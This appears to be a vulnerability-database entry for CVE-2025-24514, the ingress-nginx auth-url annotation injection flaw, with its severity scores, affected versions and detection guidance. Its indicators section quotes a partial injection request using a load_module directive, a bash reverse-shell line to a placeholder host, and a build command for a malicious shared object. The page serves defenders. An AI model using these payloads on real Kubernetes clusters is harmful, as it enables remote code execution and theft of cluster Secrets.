cbcvebase.
CVE-2025-24514
published 2025-03-25

CVE-2025-24514: A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-url` Ingress annotation can be used to inject…

PriorityP273high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
31.81%
98.1th percentile
A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-url` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)

Affected

5 ranges
VendorProductVersion rangeFixed in
k8s.ioingress-nginx>= 0 < 1.11.51.11.5
k8s.ioingress-nginx>= 1.12.0-beta.0 < 1.12.11.12.1
kubernetesingress-nginx<= 1.11.4
kubernetesingress-nginx
msrcazure_kubernetes_service

Detection & IOCsextracted from sources · hover to see the quote

port8443
commandPOST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"kind": "AdmissionReview", "apiVersion": "admission.k8s.io/v1", ..."nginx.ingress.kubernetes.io/auth-url": "http://example.com#;load_module test;\n"...}
uaqmx-ingress-exploiter
filenameevil_engine.so
filenameevil_engine.c
url/admission
commandbash -c 'bash -i >& /dev/tcp/HOST/PORT 0>&1'
commandgcc -fPIC -Wall -shared -o evil_engine.so evil_engine.c -lcrypto
  • Hunt for anomalous processes spawned from the ingress-nginx controller pod, specifically nginx processes executing with '-t' flag against a temporary config file, which indicates config validation abuse.
  • Detect behavioral indicators in the ingress-nginx namespace to identify exploitation attempts.
  • Monitor outbound IP connections from ingress-nginx pods to detect post-exploitation C2 or reverse shell activity.
  • Detect unauthenticated AdmissionReview POST requests sent directly to the admission controller endpoint (port 8443) from non-API-server sources, especially containing the auth-url annotation with injection payloads like load_module directives.
  • Match HTTP responses from the admission controller containing both 'AdmissionReview' and 'directive is not allowed here' and 'load_module' to confirm injection attempt was processed.
  • Flag anomalous shared library loads within the ingress-nginx controller pod, which may indicate exploitation via the load_module injection technique.
  • Use Shodan to identify publicly exposed ingress-nginx admission controllers for attack surface enumeration.
  • Detect exploit tool activity by hunting for the User-Agent string 'qmx-ingress-exploiter' in HTTP logs.
  • Monitor for brute-force enumeration of /proc/{pid}/fd/{fd} paths in admission controller requests, a technique used to locate uploaded malicious shared objects in memory.
  • ·The admission controller is accessible over the network without authentication by default, making it reachable from any pod in the cluster without credentials.
  • ·The vulnerability is specifically in the auth-url annotation handling: the $externalAuth.URL value is incorporated into the NGINX config without proper sanitization.
  • ·Affected versions include all versions prior to v1.11.0, versions v1.11.0 through v1.11.4, and version v1.12.0. Fixed in v1.11.5 and v1.12.1.
  • ·Disabling the admission controller (controller.admissionWebhooks.enabled=false) is a temporary mitigation but removes important safeguards; re-enable after patching.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vendor_msrc8.8HIGH
vendor_redhat8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.